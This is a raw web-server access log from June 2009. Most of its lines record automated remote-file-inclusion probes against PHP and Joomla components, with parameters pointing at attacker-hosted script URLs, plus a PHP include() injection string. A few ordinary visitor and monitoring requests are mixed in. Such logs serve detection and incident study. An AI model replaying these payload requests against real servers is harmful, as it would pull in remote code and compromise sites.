64.6.231.215 - - [10/Jun/2009:05:11:58 -0400] "GET /logs/errors.php?error=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:11:58 -0400] "GET /logs/access_log.Q109051800%20%20/errors.php?error=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:11:58 -0400] "GET /errors.php?error=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:11:58 -0400] "GET /errors.php?error=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
216.14.117.22 - - [10/Jun/2009:05:11:58 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 266 "-" "libwww-perl/5.820"
87.106.67.146 - - [10/Jun/2009:05:11:58 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.106.67.146 - - [10/Jun/2009:05:11:58 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
64.6.231.215 - - [10/Jun/2009:05:11:58 -0400] "GET /logs/errors.php?error=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:05:11:58 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.14.117.22 - - [10/Jun/2009:05:12:08 -0400] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 207 "-" "libwww-perl/5.820"
74.53.70.114 - - [10/Jun/2009:05:12:09 -0400] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
74.53.70.114 - - [10/Jun/2009:05:12:09 -0400] "GET /logs/access_log.Q109010700%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.53.70.114 - - [10/Jun/2009:05:12:09 -0400] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
80.74.64.27 - - [10/Jun/2009:05:12:13 -0400] "GET /logs/error_log.Q108061100/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:05:12:13 -0400] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
64.6.231.215 - - [10/Jun/2009:05:12:13 -0400] "GET /logs/access_log.Q109050700%20%20/errors.php?error=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.74.64.27 - - [10/Jun/2009:05:12:13 -0400] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
64.6.231.215 - - [10/Jun/2009:05:12:14 -0400] "GET /logs/access_log.Q109050700%20%20/errors.php?error=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
216.14.117.22 - - [10/Jun/2009:05:12:18 -0400] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 207 "-" "libwww-perl/5.820"
222.122.49.29 - - [10/Jun/2009:05:12:55 -0400] "GET //include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.122.49.29 - - [10/Jun/2009:05:12:55 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.49.29 - - [10/Jun/2009:05:12:55 -0400] "GET //include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.122.49.29 - - [10/Jun/2009:05:12:55 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
66.11.230.36 - - [10/Jun/2009:05:13:03 -0400] "GET /logs/access_log.Q109052400//components/com_simpleboard/image_upload.php?sbp=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.122.49.29 - - [10/Jun/2009:05:13:13 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.49.29 - - [10/Jun/2009:05:13:13 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:13:14 -0400] "GET /logs/access_log.Q109051800/errors.php?error=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.122.49.29 - - [10/Jun/2009:05:13:13 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:13:14 -0400] "GET /errors.php?error=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
222.122.49.29 - - [10/Jun/2009:05:13:13 -0400] "GET /logs/access_log.Q109051700//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:13:14 -0400] "GET /logs/errors.php?error=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:13:37 -0400] "GET /logs/access_log.Q109050700/errors.php?error=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:13:41 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:13:41 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:13:41 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:13:51 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:13:51 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:13:52 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:14:22 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:14:22 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 230 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:14:22 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
199.120.90.222 - - [10/Jun/2009:05:14:23 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
199.120.90.222 - - [10/Jun/2009:05:14:26 -0400] "GET /logs/access_log.Q109053000//doceboCms/class/class.dashboard_cms.php?where_framework=http://withipod.net/css/responz/rxid1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:14:29 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 230 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:14:29 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:14:29 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 259 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:14:39 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 230 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:14:40 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 235 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:14:40 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
222.122.49.29 - - [10/Jun/2009:05:14:59 -0400] "GET //include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
222.122.49.29 - - [10/Jun/2009:05:14:59 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
222.122.49.29 - - [10/Jun/2009:05:14:59 -0400] "GET /logs/access_log.Q109050700//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
222.122.49.29 - - [10/Jun/2009:05:15:04 -0400] "GET /logs/access_log.Q109052200//include/admin.lib.inc.php?site_path=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
74.53.70.114 - - [10/Jun/2009:05:15:10 -0400] "GET /logs/access_log.Q109051800%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.clanazo.com/site/images/banners/links.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:15 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:15 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.97.221.30 - - [10/Jun/2009:05:15:15 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.97.221.30 - - [10/Jun/2009:05:15:16 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.97.221.30 - - [10/Jun/2009:05:15:16 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:16 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:05:15:14 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
69.65.123.44 - - [10/Jun/2009:05:15:20 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:20 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
87.106.67.146 - - [10/Jun/2009:05:15:14 -0400] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 200 4907 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
69.65.123.44 - - [10/Jun/2009:05:15:21 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:21 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:21 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:22 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:27 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:27 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:27 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:28 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:28 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:28 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.232.143.238 - - [10/Jun/2009:05:15:29 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
69.65.123.44 - - [10/Jun/2009:05:15:36 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:40 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:42 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:15:43 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.97.221.30 - - [10/Jun/2009:05:15:48 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.97.221.30 - - [10/Jun/2009:05:15:48 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.97.221.30 - - [10/Jun/2009:05:15:48 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.97.221.30 - - [10/Jun/2009:05:15:49 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.97.221.30 - - [10/Jun/2009:05:15:49 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.97.221.30 - - [10/Jun/2009:05:15:49 -0400] "GET /logs/access_log.Q109052100//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:15:51 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 257 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:16:02 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
80.74.64.27 - - [10/Jun/2009:05:16:10 -0400] "GET /logs/error_log.Q108091600/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
64.6.231.215 - - [10/Jun/2009:05:16:35 -0400] "GET /logs/access_log.Q109052900/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:16:35 -0400] "GET /logs/access_log.Q109052900/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:16:35 -0400] "GET /main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:16:35 -0400] "GET /logs/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
216.14.117.22 - - [10/Jun/2009:05:16:38 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.820"
64.6.231.215 - - [10/Jun/2009:05:16:36 -0400] "GET /main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:16:35 -0400] "GET /logs/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:16:39 -0400] "GET /main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:16:39 -0400] "GET /logs/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:16:39 -0400] "GET /main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:16:39 -0400] "GET /logs/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:16:39 -0400] "GET /logs/access_log.Q109052900%20%20/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:16:39 -0400] "GET /logs/access_log.Q109052900%20%20/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.206.170.126 - - [10/Jun/2009:05:16:42 -0400] "GET /logs/access_log.Q109052300%20%20//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.0" 404 259 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:16:43 -0400] "GET /logs/access_log.Q109053000%20%20/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:16:45 -0400] "GET /logs/access_log.Q109053000%20%20/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [10/Jun/2009:05:16:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.6.231.215 - - [10/Jun/2009:05:17:10 -0400] "GET /logs/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:17:10 -0400] "GET /main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:17:11 -0400] "GET /logs/access_log.Q109052900/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:17:15 -0400] "GET /logs/access_log.Q109053000/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
94.123.72.35 - - [10/Jun/2009:05:17:20 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.123.72.35 - - [10/Jun/2009:05:17:20 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.123.72.35 - - [10/Jun/2009:05:17:21 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.123.72.35 - - [10/Jun/2009:05:17:21 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
66.232.143.238 - - [10/Jun/2009:05:17:46 -0400] "GET /logs/access_log.Q109052200//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 266 "-" "libwww-perl/5.805"
66.232.143.238 - - [10/Jun/2009:05:17:47 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
66.232.143.238 - - [10/Jun/2009:05:17:48 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
74.52.2.130 - - [10/Jun/2009:05:17:52 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.ocs-networks.com/calendar/tools/uiu.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
216.14.117.22 - - [10/Jun/2009:05:18:04 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.820"
69.65.123.44 - - [10/Jun/2009:05:18:11 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:18:18 -0400] "GET /main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:18:18 -0400] "GET /logs/access_log.Q109052900/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:18:18 -0400] "GET /logs/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.6.231.215 - - [10/Jun/2009:05:18:22 -0400] "GET /logs/access_log.Q109053000/main.php?pagina=http://personel.trakya.edu.tr/media_yedek/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
69.65.123.44 - - [10/Jun/2009:05:18:25 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
66.232.143.238 - - [10/Jun/2009:05:18:43 -0400] "GET /logs/error_log.Q108102500//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
80.74.64.27 - - [10/Jun/2009:05:18:50 -0400] "GET //components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 239 "-" "libwww-perl/5.805"
69.65.123.44 - - [10/Jun/2009:05:20:07 -0400] "GET /logs/access_log.Q109052300%20%20//skin/zero_vote/ask_password.php?dir=http://www.arcoweb.com.br/images/xxx/idxx.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
